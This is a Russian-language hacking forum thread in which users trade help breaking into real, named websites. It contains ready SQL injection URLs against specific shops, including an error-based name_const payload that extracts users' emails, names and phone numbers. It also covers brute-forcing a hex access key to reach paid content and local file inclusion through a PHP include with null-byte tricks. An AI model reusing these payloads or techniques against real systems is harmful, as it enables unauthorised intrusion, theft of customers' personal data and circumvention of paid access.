ребя подскажите инфу про сайтик: http://lenagames.com/astra/jigsaws/ сайт вроде допотопный, вылазит форма авторизации, пробовал скачать сайт и полазить внутри, ничего интересного кроме java скриптов не нашёл, а папка jigsaws без авторизации никак. В той папке лежат платные картинки для пазлов Есть прога игра с пазлами, которая региться, а потом отсылает данные по вышеизложенному адресу, а в ответ мне приходит, что-то типа неправильный ключ, нашёл и поставил ломанную прогу предыдущей версии этих пазлов и посмотрел как она лезет на сайт через Http Analyzer: "bj601_download" - как я понял это логин пароль ломанный состоял из 24 символов (символы от A до F и от 0 до 9) возможен ли метод перебора по моим параметрам или есть способы попроще?
Да. Либо еще можно найти уязвимость и прочитать .htpasswd, но я думаю, что там их нету, т.к. сайт на HTML...
А как можно вывести рабочие столбцы вот тут? Code: http://www.sonyshop.kiev.ua/index.php?t=item_det&id=1361 union select 1,2,3 -- стандартное добаление '-' и изминение значения страницы приводит к ридиректу на страницу 404
нету полей для вывода... Code: http://www.sonyshop.kiev.ua/index.php?t=item_det&id=1361+and+1=0+union+select+1,2,3+--+- пробуй как слепую покрутить....
ха, пробовал, не видно) А вот ещё вопросик. В скуле Code: http://trade.polesye.net/catalog.php?catid=2&id=176%20union%20select%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15/* Выводит вот такое Code: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION' так как первый раз такое вижу, вопрос, что это и как с ним бороться?
Code: http://trade.polesye.net/catalog.php?catid=2&id=176%20union%20select%201,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14,15/* Одни и те же вопросы.....
Головой умеешь думать? Так то тебе дали рабочий пример. Т.к. нету запроса к INFORMATION_SCHEMA. Так что запрос который ты послал сейчас, уже твои проблемы. Ибо вообще нету прав к INFORMATION_SCHEMA.
В 5й ветке можешь узнать имена столбцов в таблице (если знаешь имя таблицы): https://forum.antichat.ru/showpost.php?p=1494440&postcount=10
Имеется следующий код на пхп: PHP: if(is_file("modules/rankings/$_POST[sort].php")){include("modules/rankings/$_POST[sort].php");} Можно ли , изменяя $_POST[sort], добиться удаленного инклуда или же инклуда локальных файлов без .php? Ну попробую добавить нулевой байт и проверить.
Почему бы и нет? Просто is_file() проверяет, существует файл или нет. Если существует > загружает. Несуществует > Незнаю, кода дальше нету. Удалённого несможешь.
Как я понимаю, is_file(); не позволит инклудить удаленный файл, а вот с локальным что-то не могу разобраться. Если добавляю в конец %00, то он что-то конец не отбрасывает.
Как вы изволили выразится "конец отбросит" если magic_quotes_gpc = Off А удалённо не получится т.к. путь никуда не деть
Как сделать дамб БД при таком раскладе Code: http://www.steroids-pharma.com/product_search.php?query=mk%%27+and+(select+*+from+(select+*+from+(select+name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1),name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1))a)b) Пробовал через concat_ws and group_concat ничего неполучилось,может есть прога или скрипт который автоматически будет добавлять лимит и записывать данные в файл(проги конечно есть такие,но с такой скулей наврялти запашет).
is_file() лишь проверка на существование файла. А как уже написал jokester, директорию некуда не денешь. Возможен фильтр на %00 ,%0D пробуй, %0A.
